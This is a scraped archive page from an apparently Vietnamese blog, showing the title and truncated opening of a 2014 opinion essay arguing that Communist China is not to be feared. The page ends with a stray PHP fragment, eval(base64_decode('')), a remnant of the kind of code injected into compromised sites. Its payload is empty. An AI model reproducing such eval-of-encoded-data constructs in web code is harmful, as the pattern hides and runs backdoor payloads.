Archive for May 7th, 2014

Trung Cộng không đáng sợ

Trung Cộng không đáng sợ

Hai cuộc chiến tranh thế giới, thứ nhất và thứ hai, gây nhiều tang tóc trong lịch sử loài người nhưng cũng để lại nhiều bài học: (1) Dù đứng trên quan điểm nào, các nhà chiến lược quân sự đều đồng ý rằng, nếu chiến tranh là ch

05.7.2014 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>